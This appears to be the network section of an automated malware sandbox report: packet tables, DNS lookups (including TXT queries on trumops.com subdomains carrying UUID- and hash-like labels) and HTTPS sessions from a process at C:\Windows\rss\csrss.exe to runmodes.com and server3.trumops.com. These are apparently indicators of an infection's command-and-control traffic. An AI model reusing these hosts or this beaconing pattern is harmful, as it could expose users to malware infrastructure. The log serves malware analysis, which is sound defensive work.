Nov 11, 2021 20:35:49.153640032 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153670073 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153678894 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153719902 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153755903 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153774977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153795958 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153812885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153835058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153908014 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153924942 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153945923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153961897 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153963089 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153971910 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153985977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154004097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154026031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154042959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154063940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154077053 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154079914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154083967 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154098034 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154122114 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154139996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154160976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154176950 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154180050 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154205084 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154227972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154243946 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154267073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154268980 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154278040 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154284954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154305935 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154324055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154341936 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154345989 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154350042 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154365063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154386044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154403925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154421091 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154426098 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154431105 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154443026 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154464006 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154480934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154501915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154505014 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154512882 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154519081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154540062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154556990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154576063 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154577971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154583931 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154594898 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154616117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154633999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154656887 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154659033 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154666901 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154675007 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154695988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154712915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154736996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154736996 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154747009 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154819965 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154836893 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154845953 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154855013 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154870987 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154887915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154905081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.154947996 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.154957056 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155049086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155082941 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155100107 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155118942 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155141115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155158043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155179977 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155179977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155188084 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155199051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155216932 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155221939 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155234098 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155251980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155270100 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155292988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155302048 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155309916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155312061 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155322075 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155333042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155349970 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155368090 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155386925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155405045 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155409098 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155416012 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155426979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155441999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155458927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155482054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155486107 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155493975 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155500889 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155518055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155534983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155555010 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155555010 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155561924 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155572891 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155594110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155611038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155637980 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155643940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155647039 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155657053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155673981 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155687094 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155699968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155718088 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155730963 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155730963 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155740023 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155744076 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155762911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155776024 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155788898 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155806065 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155818939 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.155827045 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155837059 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155925989 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.155934095 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.156156063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.156191111 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.156197071 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.156200886 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.156219006 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.156493902 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165406942 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165427923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165438890 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165456057 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165471077 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165483952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165498018 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165508986 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165512085 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165524960 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165540934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165549040 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165553093 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165555954 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165555954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165577888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165591955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165606976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165621042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165622950 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165644884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165647984 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165657043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165673971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165688992 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165702105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165734053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165750027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165750980 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165755987 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165767908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165785074 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165801048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165815115 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165817022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165833950 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165842056 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165848970 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165868044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165884018 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165885925 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165889978 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.165899992 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165929079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.165935040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.166024923 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.166044950 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:51.035039902 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:51.036650896 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:36:01.389046907 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.389094114 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.389216900 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.390681028 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.390701056 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.434287071 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.434640884 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.434669018 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.435528040 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.435539961 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.437252998 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.437503099 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.439475060 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.439624071 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.439980030 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.440002918 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.502392054 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.505600929 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.505630970 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.505652905 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:01.505724907 CET	49752	443	192.168.2.3	104.21.34.203
Nov 11, 2021 20:36:01.505733013 CET	443	49752	104.21.34.203	192.168.2.3
Nov 11, 2021 20:36:19.168078899 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:36:19.186630964 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:36:49.201649904 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:36:49.218282938 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:37:02.033441067 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.033483982 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.033596039 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.034787893 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.034818888 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.095156908 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.095371008 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.095408916 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.095961094 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.095974922 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.097665071 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.097744942 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.100572109 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.100724936 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.101360083 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.101401091 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.149414062 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.193440914 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.193542004 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.193620920 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.195194960 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.195225954 CET	443	49807	172.67.139.144	192.168.2.3
Nov 11, 2021 20:37:02.195242882 CET	49807	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:37:02.195254087 CET	443	49807	172.67.139.144	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2021 20:35:29.213984966 CET	57459	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:29.235501051 CET	53	57459	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:29.262403011 CET	57875	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:29.285563946 CET	53	57875	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:29.293365955 CET	54154	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:29.314277887 CET	53	54154	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:29.410139084 CET	52806	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:29.435142040 CET	53	52806	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:29.539280891 CET	64021	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:29.560755968 CET	53	64021	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:33.254117966 CET	60784	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:33.273094893 CET	53	60784	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:37.391311884 CET	51143	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:37.410077095 CET	53	51143	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:48.704586029 CET	59026	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:48.726865053 CET	53	59026	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:48.898014069 CET	49572	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:48.920666933 CET	53	49572	8.8.8.8	192.168.2.3
Nov 11, 2021 20:35:51.045623064 CET	60823	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:35:51.067087889 CET	53	60823	8.8.8.8	192.168.2.3
Nov 11, 2021 20:36:01.359951973 CET	52130	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:36:01.379512072 CET	53	52130	8.8.8.8	192.168.2.3
Nov 11, 2021 20:37:02.006071091 CET	57106	53	192.168.2.3	8.8.8.8
Nov 11, 2021 20:37:02.025799036 CET	53	57106	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 11, 2021 20:35:29.213984966 CET	192.168.2.3	8.8.8.8	0x8e57	Standard query (0)	trumops.com	16	IN (0x0001)
Nov 11, 2021 20:35:29.262403011 CET	192.168.2.3	8.8.8.8	0x89ca	Standard query (0)	logs.trumops.com	16	IN (0x0001)
Nov 11, 2021 20:35:29.293365955 CET	192.168.2.3	8.8.8.8	0xa6c3	Standard query (0)	3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com	16	IN (0x0001)
Nov 11, 2021 20:35:29.410139084 CET	192.168.2.3	8.8.8.8	0x32e4	Standard query (0)	runmodes.com	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:29.539280891 CET	192.168.2.3	8.8.8.8	0x66ae	Standard query (0)	server3.trumops.com	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:33.254117966 CET	192.168.2.3	8.8.8.8	0xee9d	Standard query (0)	runmodes.com	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:37.391311884 CET	192.168.2.3	8.8.8.8	0x26e4	Standard query (0)	server3.trumops.com	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:48.704586029 CET	192.168.2.3	8.8.8.8	0x9707	Standard query (0)	server3.trumops.com	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:48.898014069 CET	192.168.2.3	8.8.8.8	0x948c	Standard query (0)	gohnot.com	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:51.045623064 CET	192.168.2.3	8.8.8.8	0x59e8	Standard query (0)	e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com	16	IN (0x0001)
Nov 11, 2021 20:36:01.359951973 CET	192.168.2.3	8.8.8.8	0x8ac5	Standard query (0)	runmodes.com	A (IP address)	IN (0x0001)
Nov 11, 2021 20:37:02.006071091 CET	192.168.2.3	8.8.8.8	0x71f	Standard query (0)	server3.trumops.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 11, 2021 20:35:29.235501051 CET	8.8.8.8	192.168.2.3	0x8e57	No error (0)	trumops.com			TXT (Text strings)	IN (0x0001)
Nov 11, 2021 20:35:29.285563946 CET	8.8.8.8	192.168.2.3	0x89ca	No error (0)	logs.trumops.com			TXT (Text strings)	IN (0x0001)
Nov 11, 2021 20:35:29.314277887 CET	8.8.8.8	192.168.2.3	0xa6c3	Name error (3)	3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com	none	none	16	IN (0x0001)
Nov 11, 2021 20:35:29.435142040 CET	8.8.8.8	192.168.2.3	0x32e4	No error (0)	runmodes.com		172.67.207.136	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:29.435142040 CET	8.8.8.8	192.168.2.3	0x32e4	No error (0)	runmodes.com		104.21.34.203	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:29.560755968 CET	8.8.8.8	192.168.2.3	0x66ae	No error (0)	server3.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:29.560755968 CET	8.8.8.8	192.168.2.3	0x66ae	No error (0)	server3.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:33.273094893 CET	8.8.8.8	192.168.2.3	0xee9d	No error (0)	runmodes.com		172.67.207.136	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:33.273094893 CET	8.8.8.8	192.168.2.3	0xee9d	No error (0)	runmodes.com		104.21.34.203	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:37.410077095 CET	8.8.8.8	192.168.2.3	0x26e4	No error (0)	server3.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:37.410077095 CET	8.8.8.8	192.168.2.3	0x26e4	No error (0)	server3.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:48.726865053 CET	8.8.8.8	192.168.2.3	0x9707	No error (0)	server3.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:48.726865053 CET	8.8.8.8	192.168.2.3	0x9707	No error (0)	server3.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:48.920666933 CET	8.8.8.8	192.168.2.3	0x948c	No error (0)	gohnot.com		172.67.196.11	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:48.920666933 CET	8.8.8.8	192.168.2.3	0x948c	No error (0)	gohnot.com		104.21.92.165	A (IP address)	IN (0x0001)
Nov 11, 2021 20:35:51.067087889 CET	8.8.8.8	192.168.2.3	0x59e8	No error (0)	e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com			TXT (Text strings)	IN (0x0001)
Nov 11, 2021 20:36:01.379512072 CET	8.8.8.8	192.168.2.3	0x8ac5	No error (0)	runmodes.com		104.21.34.203	A (IP address)	IN (0x0001)
Nov 11, 2021 20:36:01.379512072 CET	8.8.8.8	192.168.2.3	0x8ac5	No error (0)	runmodes.com		172.67.207.136	A (IP address)	IN (0x0001)
Nov 11, 2021 20:37:02.025799036 CET	8.8.8.8	192.168.2.3	0x71f	No error (0)	server3.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 20:37:02.025799036 CET	8.8.8.8	192.168.2.3	0x71f	No error (0)	server3.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

runmodes.com

server3.trumops.com

gohnot.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	172.67.207.136	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49746	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

